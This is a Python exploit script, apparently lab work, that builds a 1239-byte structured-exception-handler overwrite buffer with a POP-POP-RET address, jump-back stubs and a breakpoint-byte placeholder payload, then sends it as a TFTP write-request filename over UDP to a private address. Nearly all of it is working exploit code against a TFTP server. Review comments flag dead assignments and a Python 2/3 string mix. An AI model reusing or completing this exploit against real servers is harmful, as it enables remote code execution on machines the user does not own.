tsunulukai_pwn_canvas_example.py
#!/usr/bin/env python
"""Example layout of an SEH-overwrite test buffer using tsunulukai_pwn_canvas.

The script assembles a 1239-byte buffer out of colour-tagged "snippets"
(so the library's hexdump shows where each piece lands), wraps it in a
TFTP write request (WRQ) and sends it once over UDP to a lab host on a
private (RFC 1918) address.  Everything that is not defined in this file
-- payload, snip, nop, brk, the C* colour constants, struct and pwn --
is expected to be provided by the star import below; none of it is
imported explicitly.
"""
from tsunulukai_pwn_canvas import *
# Target
host="192.168.1.100"
port=69
tpt="udp"
# Snippets
# NOTE(review): struct is not imported in this file, so it must be re-exported
# by the star import above.  struct.pack returns bytes on Python 3 but str on
# Python 2, while every other snippet below is a str literal; the mixed
# concatenation inside the library only works under Python 2 -- confirm which
# interpreter the "python" shebang resolves to on the box running this.
seh = struct.pack('<I',0x0040484F) # POP EDI, POP EBP, RET
jmpback="\xeb\xea" # jmp short -20
longjmpback="\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1" #jmp eip-512
# Placeholder for the payload body: 350 copies of brk (presumably a software
# breakpoint byte from the library, so a hit is visible in a debugger).
sc=brk*350
# Buffer
# NOTE(review): this payload object is discarded by the very next line (dead
# assignment).  Whether payload() has side effects is not visible here, so
# confirm before deleting it.
p = payload(nop*1236)
p = payload(length=1239)
# Offsets are byte positions inside the 1239-byte buffer.  Later snippets
# appear to overwrite earlier ones where they overlap ("overlaptest" below is
# placed on top of sc) -- the order of the p.add() calls therefore matters.
p.add(snip(1232,seh,"seh",CYEL)) # SEH handler SEH chain SE handler=31704230; Pattern 0Bp1 (0x31704230) found in cyclic pattern at position 1232
p.add(snip(1228,jmpback,"jmpback",CRED))
p.add(snip(1208,longjmpback,"longjmpback",CPUR))
p.add(snip(194+512,sc,"sc",CGRE))
p.add(snip(194+600,"AAAAAAAAAAAARGHH","overlaptest",CYEL))
# The next three snippets carry no colour argument and exercise the canvas's
# automatic colouring.
p.add(snip(672,nop*8,"nop")) # Autocolor test
p.add(snip(680,brk*8,"brk")) # Autocolor test
p.add(snip(688,"\xff"*8,"ff")) # Autocolor test
p.generate()
buf = p.content
#Build TFTP packet
opcode = "\x00\x02" # TFTP WRQ
fn = buf
mode = "netascii"
null = "\x00"
# NOTE(review): this first req is overwritten two lines down and is never
# sent; it looks like the original WRQ layout kept for reference.
req = opcode + fn + null + mode + null
# The intermediate null byte is now part of the fn (jmpecx)
req = opcode + fn + mode + null
#Connect and send
print("len : " + str(len(req)))
# Prints the colour-tagged layout of the buffer built above.
p.hexdump()
# pwn.connect is also expected from the star import; typ selects UDP here.
c=pwn.connect(host=host,port=port,typ=tpt)
c.send(req)
#print c.recv()
c.close()